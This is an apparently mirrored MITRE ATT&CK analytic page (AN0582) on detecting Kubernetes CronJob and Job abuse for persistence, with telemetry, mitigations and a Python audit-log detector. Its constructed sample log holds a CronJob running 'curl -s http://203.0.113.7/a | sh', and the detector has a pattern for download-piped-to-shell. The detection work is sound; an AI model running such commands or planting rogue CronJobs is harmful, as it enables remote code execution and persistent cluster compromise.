AN0582: Analytic 0582
Detects abuse of container orchestration platforms (e.g., Kubernetes) where adversaries create CronJobs to maintain persistence or execute malicious Jobs across the cluster.
Analyst context for executives and security teams
AN0582 is a detection analytic for container environments where an adversary abuses orchestration features, such as Kubernetes CronJobs, to run recurring or cluster-wide malicious work. For leaders, the practical issue is that scheduled workload objects can turn a container platform into a persistence mechanism, so resilience depends on knowing who can create those objects, whether those creations are logged, and whether suspicious scheduling activity is reviewed quickly.
Executive priority
Prioritize this where container orchestration platforms support important business services. The decision value is access governance and operational assurance: validate that teams can prove who created or changed CronJobs and Jobs, that unusual scheduled workload creation can be investigated, and that incident responders have enough audit evidence to distinguish legitimate automation from persistence. Because ATT&CK provides no detection logic for this analytic, organizations should treat it as a coverage-validation item rather than an out-of-the-box detection guarantee.
Technical view
For SOC, detection engineering, and IR teams, validate visibility into creation and modification of container orchestration scheduled workload objects, especially CronJobs that launch Jobs across a cluster. Review whether telemetry captures the requesting identity, namespace, object name, schedule, image or command metadata where available, timestamps, and source context. Since no tactics are specified and no official detection text is provided, build local logic around deviations from approved automation patterns and correlate with identity, change-management, and workload inventory context.
Likely telemetry
- Container orchestration audit events for CronJob and Job create, update, patch, and delete actions (in Kubernetes, kubectl edit and kubectl apply against an existing object arrive as patch or update, so logic keyed on create alone misses modifications)
- Cluster object inventory or configuration-state changes for scheduled workload resources
- Identity and access records showing the user, service account, or automation creating scheduled jobs
- Namespace and workload metadata associated with the scheduled job
- Change-management or deployment pipeline records for expected scheduled workload creation
Detection direction
- Confirm that container audit logging is enabled and retained for scheduled workload object activity, and that the audit policy captures request bodies for these resources: in Kubernetes, a rule at level Metadata records who wrote which CronJob and when but omits the schedule, image, and command, which require level Request or RequestResponse.
- Baseline approved CronJobs and recurring Jobs by namespace, owner, service account, schedule, and deployment source.
- Tune for newly created or modified CronJobs that do not align with known release pipelines or administrative automation.
- Correlate suspicious scheduled workload creation with identity context and recent cluster access activity before escalating.
- Account for false positives from legitimate platform maintenance, backup jobs, CI/CD automation, and application schedulers.
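The telemetry and detection direction above, turned into runnable logic, as an added example that is not part of the ATT&CK record or of Glexia's analysis. It parses Kubernetes API server audit events (audit.k8s.io/v1 JSON lines, constructed here for illustration), keeps only writes to batch/cronjobs and batch/jobs, skips Jobs spawned by the CronJob controller, and compares each write against an assumed baseline of approved writers per namespace and approved image registries. The baseline, the namespaces, identities, images, names and IP addresses in the sample, and the "more than hourly" and "download piped to a shell" heuristics are assumptions made for the example, not facts from the page.

```python
import json
import re

# Verbs that change scheduled workload objects; reads (get/list/watch) are ignored.
WRITE_VERBS = {"create", "update", "patch", "delete"}
# (apiGroup, resource) pairs of Kubernetes scheduled workload objects.
SCHEDULED_RESOURCES = {("batch", "cronjobs"), ("batch", "jobs")}
# Jobs spawned by the CronJob controller are expected side effects of an existing
# CronJob, which was evaluated when it was itself created or modified.
CONTROLLER_IDENTITIES = {"system:serviceaccount:kube-system:cronjob-controller"}
# Assumed baseline (not from the page): approved writers per namespace and the
# registries that approved scheduled workload images come from.
APPROVED_WRITERS = {
    "payments": {"system:serviceaccount:ci:deployer"},
    "kube-system": {"platform-admin"},
}
APPROVED_REGISTRIES = ("registry.corp/",)
# Assumed heuristic: a fetch tool whose output is piped into a shell.
DOWNLOAD_AND_RUN = re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b")

# Constructed audit.k8s.io/v1 events (JSON lines) for illustration; not real logs.
# The fifth event was recorded at audit level Metadata, so it has no requestObject.
SAMPLE_AUDIT_LOG = r"""
{"kind":"Event","apiVersion":"audit.k8s.io/v1","stage":"ResponseComplete","verb":"create","user":{"username":"system:serviceaccount:ci:deployer","groups":["system:serviceaccounts"]},"objectRef":{"resource":"cronjobs","apiGroup":"batch","namespace":"payments","name":"nightly-report"},"requestObject":{"spec":{"schedule":"0 2 * * *","jobTemplate":{"spec":{"template":{"spec":{"containers":[{"name":"report","image":"registry.corp/payments/report:1.4"}]}}}}}},"responseStatus":{"code":201},"requestReceivedTimestamp":"2026-01-10T02:00:11Z","sourceIPs":["10.0.5.12"]}
{"kind":"Event","apiVersion":"audit.k8s.io/v1","stage":"ResponseComplete","verb":"create","user":{"username":"jdoe","groups":["system:authenticated","developers"]},"objectRef":{"resource":"cronjobs","apiGroup":"batch","namespace":"payments","name":"kube-proxy-sync"},"requestObject":{"spec":{"schedule":"*/5 * * * *","jobTemplate":{"spec":{"template":{"spec":{"containers":[{"name":"sync","image":"docker.io/someuser/helper:latest","command":["sh","-c","curl -s http://203.0.113.7/a | sh"]}]}}}}}},"responseStatus":{"code":201},"requestReceivedTimestamp":"2026-01-10T03:14:52Z","sourceIPs":["198.51.100.9"]}
{"kind":"Event","apiVersion":"audit.k8s.io/v1","stage":"ResponseComplete","verb":"get","user":{"username":"jdoe","groups":["system:authenticated"]},"objectRef":{"resource":"cronjobs","apiGroup":"batch","namespace":"payments","name":"nightly-report"},"responseStatus":{"code":200},"requestReceivedTimestamp":"2026-01-10T03:15:00Z","sourceIPs":["198.51.100.9"]}
{"kind":"Event","apiVersion":"audit.k8s.io/v1","stage":"ResponseComplete","verb":"create","user":{"username":"system:serviceaccount:kube-system:cronjob-controller","groups":["system:serviceaccounts"]},"objectRef":{"resource":"jobs","apiGroup":"batch","namespace":"payments","name":"nightly-report-29012280"},"requestObject":{"metadata":{"ownerReferences":[{"kind":"CronJob","name":"nightly-report"}]},"spec":{"template":{"spec":{"containers":[{"name":"report","image":"registry.corp/payments/report:1.4"}]}}}},"responseStatus":{"code":201},"requestReceivedTimestamp":"2026-01-10T03:20:00Z","sourceIPs":["10.0.1.3"]}
{"kind":"Event","apiVersion":"audit.k8s.io/v1","stage":"ResponseComplete","verb":"patch","user":{"username":"system:serviceaccount:kube-system:default","groups":["system:serviceaccounts"]},"objectRef":{"resource":"cronjobs","apiGroup":"batch","namespace":"kube-system","name":"cleanup"},"responseStatus":{"code":200},"requestReceivedTimestamp":"2026-01-10T03:30:00Z","sourceIPs":["10.0.1.3"]}
{"kind":"Event","apiVersion":"audit.k8s.io/v1","stage":"ResponseComplete","verb":"create","user":{"username":"jdoe","groups":["system:authenticated","developers"]},"objectRef":{"resource":"cronjobs","apiGroup":"batch","namespace":"kube-system","name":"staging-sync"},"requestObject":{"spec":{"schedule":"0 * * * *","jobTemplate":{"spec":{"template":{"spec":{"containers":[{"name":"sync","image":"registry.corp/tools/sync:2.0"}]}}}}}},"responseStatus":{"code":403,"reason":"Forbidden"},"requestReceivedTimestamp":"2026-01-10T03:40:00Z","sourceIPs":["198.51.100.9"]}
{"kind":"Event","apiVersion":"audit.k8s.io/v1","stage":"ResponseComplete","verb":"create","user":{"username":"system:serviceaccount:ci:deployer","groups":["system:serviceaccounts"]},"objectRef":{"resource":"jobs","apiGroup":"batch","namespace":"payments","name":"migrate-42"},"requestObject":{"spec":{"template":{"spec":{"containers":[{"name":"migrate","image":"registry.corp/payments/migrate:42"}]}}}},"responseStatus":{"code":201},"requestReceivedTimestamp":"2026-01-10T03:45:00Z","sourceIPs":["10.0.5.12"]}
"""


def parse_events(text):
    """Yield audit events from JSON-lines text, skipping blank or malformed lines."""
    for line in text.splitlines():
        line = line.strip()
        if line:
            try:
                yield json.loads(line)
            except json.JSONDecodeError:
                continue


def pod_containers(ev):
    """Containers from the logged request body, or None when the body was not logged
    (audit level Metadata records who, what and when, but not object contents)."""
    body = ev.get("requestObject")
    if body is None:
        return None
    spec = body.get("spec", {})
    if ev["objectRef"]["resource"] == "cronjobs":
        spec = spec.get("jobTemplate", {}).get("spec", {})
    pod = spec.get("template", {}).get("spec", {})
    return pod.get("initContainers", []) + pod.get("containers", [])


def runs_more_than_hourly(schedule):
    """Assumed heuristic: a minute field of '*' or '*/N' is rare for approved batch work."""
    minute = schedule.split()[0] if schedule else ""
    return minute == "*" or minute.startswith("*/")


def evaluate(ev):
    """Return a finding for a suspicious scheduled workload write, else None."""
    ref = ev.get("objectRef", {})
    if (ev.get("stage") != "ResponseComplete" or ev.get("verb") not in WRITE_VERBS
            or (ref.get("apiGroup"), ref.get("resource")) not in SCHEDULED_RESOURCES):
        return None
    user = ev.get("user", {}).get("username", "")
    if user in CONTROLLER_IDENTITIES:
        return None
    ns = ref.get("namespace", "")
    reasons = []
    if user not in APPROVED_WRITERS.get(ns, set()):
        reasons.append("writer not in approved baseline for namespace")
    containers = pod_containers(ev)
    if containers is not None:
        for c in containers:
            image = c.get("image", "")
            if not image.startswith(APPROVED_REGISTRIES):
                reasons.append(f"image outside approved registries: {image}")
            cmd = " ".join(c.get("command", []) + c.get("args", []))
            if DOWNLOAD_AND_RUN.search(cmd):
                reasons.append("command fetches remote content and pipes it to a shell")
        schedule = ev["requestObject"].get("spec", {}).get("schedule")
        if ref["resource"] == "cronjobs" and runs_more_than_hourly(schedule):
            reasons.append(f"runs more than hourly: {schedule}")
    if not reasons:
        return None
    return {
        "time": ev.get("requestReceivedTimestamp"),
        "user": user,
        "verb": ev["verb"],
        "namespace": ns,
        "resource": ref["resource"],
        "name": ref.get("name"),
        "source_ips": ev.get("sourceIPs", []),
        # A 403 is an attempted write that RBAC blocked; still worth an analyst's eyes.
        "denied": ev.get("responseStatus", {}).get("code", 0) >= 400,
        "body_logged": containers is not None,
        "reasons": reasons,
    }


def detect(text):
    """Run evaluate() over every event and return the findings in log order."""
    return [f for f in map(evaluate, parse_events(text)) if f]


if __name__ == "__main__":
    for finding in detect(SAMPLE_AUDIT_LOG):
        print(json.dumps(finding))
```

Run against the constructed sample, the approved deployer's CronJob and Job, the read, and the controller-spawned Job produce nothing; the developer's every-five-minutes CronJob with an unapproved image and a curl-to-shell command is reported with four reasons, the kube-system patch by the default service account is reported on identity alone with body_logged false (a visibility gap the analyst should know about, not a verdict), and the denied kube-system create is kept as an attempted write. The baseline dictionaries are the part that has to be replaced with the organization's own inventory of approved automation before this is useful.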
Mitigation priorities
- Restrict who can create or modify CronJobs and Jobs in container orchestration platforms using least-privilege access controls.
- Maintain an approved inventory of scheduled workload objects and owners.
- Require controlled deployment paths or change approval for new recurring cluster jobs.
- Ensure audit logging and retention are sufficient for incident response and compliance evidence.
- Review the service accounts that scheduled workload pods run as: the account token is mounted into the job container by default, so an over-privileged account turns a single CronJob into cluster-wide access.
Analyst notes and limits
This object is a detection analytic, not a full ATT&CK technique entry. The only supplied platform is Containers, and the description specifically references container orchestration platforms such as Kubernetes and CronJobs. No relationships, tactic mapping, or official detection procedure were supplied, so local engineering must define the exact queries, thresholds, and escalation criteria.
The ATT&CK record provides a short description but no official detection text and no relationship context. This take does not assert active exploitation, actor attribution, business impact, or existing detection coverage. Effective validation requires environment-specific cluster architecture, logging configuration, RBAC model, and approved automation inventory.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | 0875ed8b6324… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] mitre-attack AN0582
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.